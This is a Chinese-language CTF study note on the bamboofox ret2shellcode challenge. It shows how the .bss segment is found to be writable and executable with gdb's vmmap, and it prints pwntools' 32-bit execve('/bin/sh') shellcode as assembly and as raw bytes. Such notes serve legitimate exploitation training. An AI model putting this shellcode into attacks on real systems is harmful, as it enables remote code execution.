ctfwiki的例子

bamboofox 中的 ret2shellcode:

需要有可读可写可执行的段,将shellcode写入这里,然后执行shellcode

这道题其实是给的一种很简单的方法,直接把shellcode写入了bss段,然后这个段是可读可写可执行的

1
2
3
4
5
6
.bss:0804A065                 align 20h
.bss:0804A080                 public buf2
.bss:0804A080 ; char buf2[100]
.bss:0804A080 buf2            db 64h dup(?)           ; DATA XREF: main+7B↑o
.bss:0804A080 _bss            ends
.bss:0804A080

查看各个段的属性

方法一:在gdb中调试,启动程序后用vmmap

.bss:0804A080 对应着 0x804a000 0x804b000 0x001000 rwx /home/ubuntu/shellcode/ret2shellcode

可读可写可执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
gef➤  vmmap
[ Legend:  Code | Heap | Stack ]
Start      End        Offset     Perm Path
0x8048000 0x8049000 0x000000 r-x /home/ubuntu/shellcode/ret2shellcode
0x8049000 0x804a000 0x000000 r-x /home/ubuntu/shellcode/ret2shellcode
0x804a000 0x804b000 0x001000 rwx /home/ubuntu/shellcode/ret2shellcode
0xf7de5000 0xf7fba000 0x000000 r-x /lib/i386-linux-gnu/libc-2.27.so
0xf7fba000 0xf7fbb000 0x1d5000 --- /lib/i386-linux-gnu/libc-2.27.so
0xf7fbb000 0xf7fbd000 0x1d5000 r-x /lib/i386-linux-gnu/libc-2.27.so
0xf7fbd000 0xf7fbe000 0x1d7000 rwx /lib/i386-linux-gnu/libc-2.27.so
0xf7fbe000 0xf7fc1000 0x000000 rwx
0xf7fd0000 0xf7fd2000 0x000000 rwx
0xf7fd2000 0xf7fd5000 0x000000 r-- [vvar]
0xf7fd5000 0xf7fd6000 0x000000 r-x [vdso]
0xf7fd6000 0xf7ffc000 0x000000 r-x /lib/i386-linux-gnu/ld-2.27.so
0xf7ffc000 0xf7ffd000 0x025000 r-x /lib/i386-linux-gnu/ld-2.27.so
0xf7ffd000 0xf7ffe000 0x026000 rwx /lib/i386-linux-gnu/ld-2.27.so
0xfffdd000 0xffffe000 0x000000 rwx [stack]

方法二:readelf

pwntools中的shellcode相关函数

shellcraft.sh() 汇编代码的shellcode

asm(shellcraft.sh()) 二进制机器码(16进制)的shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
shellcraft.sh()

/* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    mov ebx, esp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    push 0x1010101
    xor dword ptr [esp], 0x1016972
    xor ecx, ecx
    push ecx /* null terminate */
    push 4
    pop ecx
    add ecx, esp
    push ecx /* 'sh\x00' */
    mov ecx, esp
    xor edx, edx
    /* call execve() */
    push SYS_execve /* 0xb */
    pop eax
    int 0x80

asm(shellcraft.sh()) 
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'